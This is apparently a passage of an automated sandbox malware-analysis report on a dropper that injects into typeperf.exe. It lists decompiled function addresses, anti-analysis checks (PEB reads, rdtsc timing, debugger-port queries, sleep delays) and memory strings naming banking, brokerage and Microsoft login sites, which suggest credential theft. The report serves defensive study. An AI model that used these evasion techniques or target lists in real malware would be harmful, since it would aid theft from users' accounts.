            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02924920 push esp; retf 11_2_0292493F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_02930DF7 push ebx; iretd 11_2_02930DF8
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeFile created: C:\Users\user\AppData\Local\Temp\okawzsv.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00412E59 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00412E59
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-21132
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E rdtsc 5_2_00AA096E
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 2492Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeWindow / User API: threadDelayed 7480Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeAPI coverage: 1.4 %
            Source: C:\Windows\SysWOW64\typeperf.exeAPI coverage: 2.9 %
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep count: 2492 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep time: -4984000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep count: 7480 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exe TID: 7616Thread sleep time: -14960000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep count: 45 > 30Jump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe TID: 7752Thread sleep time: -45000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\typeperf.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,0_2_00405E93
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004054BD
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeCode function: 0_2_00402671 FindFirstFileA,0_2_00402671
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00401570 FindFirstFileW,FindNextFileW,FindClose,2_2_00401570
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 11_2_0293C010 FindFirstFileW,FindNextFileW,FindClose,11_2_0293C010
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F07DA GetSystemInfo,2_2_004F07DA
            Source: 281B196J.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ice.comVMware20,11696503903s
            Source: 281B196J.11.drBinary or memory string: tasks.office.comVMware20,11696503903o
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,1169650?!$Ot
            Source: 281B196J.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: 281B196J.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: 281B196J.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: 281B196J.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: typeperf.exe, 0000000B.00000002.3739404042.0000000007699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,116
            Source: 281B196J.11.drBinary or memory string: bankofamerica.comVMware20,11696503903x
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: 281B196J.11.drBinary or memory string: global block list test formVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: 281B196J.11.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: interactivebrokers.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: 281B196J.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3734976892.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
            Source: 281B196J.11.drBinary or memory string: AMC password management pageVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: 281B196J.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: 281B196J.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: 281B196J.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: 281B196J.11.drBinary or memory string: outlook.office365.comVMware20,11696503903t
            Source: 281B196J.11.drBinary or memory string: outlook.office.comVMware20,11696503903s
            Source: 281B196J.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: 281B196J.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: 281B196J.11.drBinary or memory string: dev.azure.comVMware20,11696503903j
            Source: 281B196J.11.drBinary or memory string: discord.comVMware20,11696503903f
            Source: 281B196J.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: C:\Users\user\Desktop\BMhDm7YW62.exeAPI call chain: ExitProcess graph end nodegraph_0-3463
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E rdtsc 5_2_00AA096E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_004173A3 LdrLoadDll,5_2_004173A3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0042093F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042093F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_0042093F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042093F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F005F mov eax, dword ptr fs:[00000030h]2_2_004F005F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F017B mov eax, dword ptr fs:[00000030h]2_2_004F017B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F0109 mov eax, dword ptr fs:[00000030h]2_2_004F0109
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004F013E mov eax, dword ptr fs:[00000030h]2_2_004F013E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF80A8 mov eax, dword ptr fs:[00000030h]5_2_00AF80A8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B260B8 mov eax, dword ptr fs:[00000030h]5_2_00B260B8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B260B8 mov ecx, dword ptr fs:[00000030h]5_2_00B260B8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6208A mov eax, dword ptr fs:[00000030h]5_2_00A6208A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A0E3 mov ecx, dword ptr fs:[00000030h]5_2_00A5A0E3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE60E0 mov eax, dword ptr fs:[00000030h]5_2_00AE60E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A680E9 mov eax, dword ptr fs:[00000030h]5_2_00A680E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C0F0 mov eax, dword ptr fs:[00000030h]5_2_00A5C0F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA20F0 mov ecx, dword ptr fs:[00000030h]5_2_00AA20F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE20DE mov eax, dword ptr fs:[00000030h]5_2_00AE20DE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A020 mov eax, dword ptr fs:[00000030h]5_2_00A5A020
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C020 mov eax, dword ptr fs:[00000030h]5_2_00A5C020
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6030 mov eax, dword ptr fs:[00000030h]5_2_00AF6030
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE4000 mov ecx, dword ptr fs:[00000030h]5_2_00AE4000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B02000 mov eax, dword ptr fs:[00000030h]5_2_00B02000
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E016 mov eax, dword ptr fs:[00000030h]5_2_00A7E016
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E016 mov eax, dword ptr fs:[00000030h]5_2_00A7E016
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E016 mov eax, dword ptr fs:[00000030h]5_2_00A7E016
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E016 mov eax, dword ptr fs:[00000030h]5_2_00A7E016
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8C073 mov eax, dword ptr fs:[00000030h]5_2_00A8C073
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A62050 mov eax, dword ptr fs:[00000030h]5_2_00A62050
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE6050 mov eax, dword ptr fs:[00000030h]5_2_00AE6050
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA0185 mov eax, dword ptr fs:[00000030h]5_2_00AA0185
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04180 mov eax, dword ptr fs:[00000030h]5_2_00B04180
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04180 mov eax, dword ptr fs:[00000030h]5_2_00B04180
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE019F mov eax, dword ptr fs:[00000030h]5_2_00AE019F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE019F mov eax, dword ptr fs:[00000030h]5_2_00AE019F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE019F mov eax, dword ptr fs:[00000030h]5_2_00AE019F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE019F mov eax, dword ptr fs:[00000030h]5_2_00AE019F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A197 mov eax, dword ptr fs:[00000030h]5_2_00A5A197
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A197 mov eax, dword ptr fs:[00000030h]5_2_00A5A197
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A197 mov eax, dword ptr fs:[00000030h]5_2_00A5A197
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1C188 mov eax, dword ptr fs:[00000030h]5_2_00B1C188
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B1C188 mov eax, dword ptr fs:[00000030h]5_2_00B1C188
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A901F8 mov eax, dword ptr fs:[00000030h]5_2_00A901F8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B361E5 mov eax, dword ptr fs:[00000030h]5_2_00B361E5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B261C3 mov eax, dword ptr fs:[00000030h]5_2_00B261C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B261C3 mov eax, dword ptr fs:[00000030h]5_2_00B261C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov eax, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov eax, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov ecx, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov eax, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE1D0 mov eax, dword ptr fs:[00000030h]5_2_00ADE1D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90124 mov eax, dword ptr fs:[00000030h]5_2_00A90124
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B20115 mov eax, dword ptr fs:[00000030h]5_2_00B20115
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov ecx, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov eax, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov eax, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0A118 mov eax, dword ptr fs:[00000030h]5_2_00B0A118
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov eax, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov eax, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov ecx, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov eax, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF4144 mov eax, dword ptr fs:[00000030h]5_2_00AF4144
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66154 mov eax, dword ptr fs:[00000030h]5_2_00A66154
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66154 mov eax, dword ptr fs:[00000030h]5_2_00A66154
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5C156 mov eax, dword ptr fs:[00000030h]5_2_00A5C156
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF8158 mov eax, dword ptr fs:[00000030h]5_2_00AF8158
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702A0 mov eax, dword ptr fs:[00000030h]5_2_00A702A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702A0 mov eax, dword ptr fs:[00000030h]5_2_00A702A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov ecx, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF62A0 mov eax, dword ptr fs:[00000030h]5_2_00AF62A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE0283 mov eax, dword ptr fs:[00000030h]5_2_00AE0283
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE0283 mov eax, dword ptr fs:[00000030h]5_2_00AE0283
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE0283 mov eax, dword ptr fs:[00000030h]5_2_00AE0283
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E284 mov eax, dword ptr fs:[00000030h]5_2_00A9E284
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9E284 mov eax, dword ptr fs:[00000030h]5_2_00A9E284
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702E1 mov eax, dword ptr fs:[00000030h]5_2_00A702E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702E1 mov eax, dword ptr fs:[00000030h]5_2_00A702E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A702E1 mov eax, dword ptr fs:[00000030h]5_2_00A702E1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A2C3 mov eax, dword ptr fs:[00000030h]5_2_00A6A2C3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5823B mov eax, dword ptr fs:[00000030h]5_2_00A5823B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10274 mov eax, dword ptr fs:[00000030h]5_2_00B10274
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64260 mov eax, dword ptr fs:[00000030h]5_2_00A64260
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5826B mov eax, dword ptr fs:[00000030h]5_2_00A5826B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE8243 mov eax, dword ptr fs:[00000030h]5_2_00AE8243
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE8243 mov ecx, dword ptr fs:[00000030h]5_2_00AE8243
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5A250 mov eax, dword ptr fs:[00000030h]5_2_00A5A250
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66259 mov eax, dword ptr fs:[00000030h]5_2_00A66259
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8438F mov eax, dword ptr fs:[00000030h]5_2_00A8438F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8438F mov eax, dword ptr fs:[00000030h]5_2_00A8438F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5E388 mov eax, dword ptr fs:[00000030h]5_2_00A5E388
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58397 mov eax, dword ptr fs:[00000030h]5_2_00A58397
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A703E9 mov eax, dword ptr fs:[00000030h]5_2_00A703E9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A963FF mov eax, dword ptr fs:[00000030h]5_2_00A963FF
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A7E3F0 mov eax, dword ptr fs:[00000030h]5_2_00A7E3F0
